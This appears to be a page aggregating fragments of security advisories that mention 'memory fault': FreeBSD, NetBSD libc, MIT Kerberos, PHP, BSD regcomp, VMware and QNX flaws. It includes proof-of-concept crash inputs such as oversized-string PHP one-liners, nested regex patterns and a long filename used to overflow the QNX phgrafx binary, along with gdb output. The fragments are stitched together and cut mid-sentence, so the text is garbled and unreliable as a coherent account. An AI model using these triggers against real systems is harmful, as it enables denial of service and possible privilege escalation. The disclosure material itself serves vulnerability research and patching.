
memory fault

FreeBSD Security Advisory FreeBSD-SA-08:07.amd64

As the processor switches between user and kernel level, a number of
checks are performed in order to implement the privilege protection
system.  If the processor detects a problem while attempting to switch
privilege levels it generates a trap - typically a general protection
fault (GPF).  In that case, the processor aborts the return to the
user level process and re-enters the kernel.  The FreeBSD kernel
allows the user process to be notified of such an event by a signal
(SIGSEGV or SIGBUS).

II.  Problem Description

NetBSD 5.1 libc/net multiple functions stack buffer overflow

--- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files such as getservbyname_r.c and getservbyport_r.c. The getservbyname*(3), getservbyport*(3) and getaddrinfo(3) functions of the NetBSD libc implementation are exposed to a possible buffer overflow. To demonstrate this issue, we may use PHP as an attack vector.

127# php -r 'getservbyname("A",str_repeat("A",7108));' 
127# php -r 'getservbyname("A",str_repeat("A",7109));' 
Memory fault (core dumped)

-php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
        char *name, *proto;

MITKRB5-SA-2009-004 [CVE-2009-4212] integer underflow in AES and RC4 decryption

An unauthenticated remote attacker can, by inducing the decryption of
an invalid AES or RC4 ciphertext, cause a crash or heap corruption,
or, under extraordinarily unlikely conditions, arbitrary code
execution.  A successful code-execution attack against a KDC can
compromise all services relying on that KDC for authentication.
However, the most probable outcome is a crash due to a memory fault or
abort() call.  An attacker with a valid account in the relevant
Kerberos realm has a marginally higher chance of success to execute
arbitrary code, but the probability is still very low.  Therefore, the
given Confidentiality Impact and Integrity Impact metrics of
"Complete" represent theoretical worst-case scenarios and are both

PHP 5.3.6 multiple null pointer dereference

<?php
$strx=str_repeat("A",$argv[1]);
var_dump(strtotime($strx));
?>

127#
127#  /cxib/5371/build/bin/php /www/strtotime.php 33388888 
Memory fault (core dumped) 

127# gdb -q /cxib/5371/build/bin/php
(gdb) r /www/strtotime.php 33388888
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888


Multiple BSD libc/regcomp(3) Multiple Vulnerabilities

pattern1:
./poc '(.?)((((.*){1,100}){1,100}){1,100}){1,100}' 

pattern2:
./poc '(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}'
Memory fault (core dumped) 
gdb openbsd 4.9:
1275            (void) memcpy((char *)(p->strip + p->slen),
(gdb) print p->slen
$14 = 218103912
(gdb) print start  

VMware Emulation Flaw x64 Guest Privilege Escalation (1/2)

address in which the 16 most significant bits each equal bit 47, or in
other words, a 48-bit address properly sign-extended to 64 bits.  Any
other address is non-canonical.

If an indirect jump ("JMP mem") attempts to transfer execution to a
non-canonical RIP, a proper CPU will raise a general protection fault
(#GP) at the address of the JMP instruction, before executing the
instruction.  Affected versions of VMware, on the other hand, will
improperly execute the instruction, which assigns a non-canonical
address to RIP, and will then raise a #GP fault because RIP is
non-canonical.  Therefore, when the #GP handler is invoked, it will

VMware Emulation Flaw x64 Guest Privilege Escalation (2/2)

[SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability

# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#

IV. Solution

According to the vendor's response:


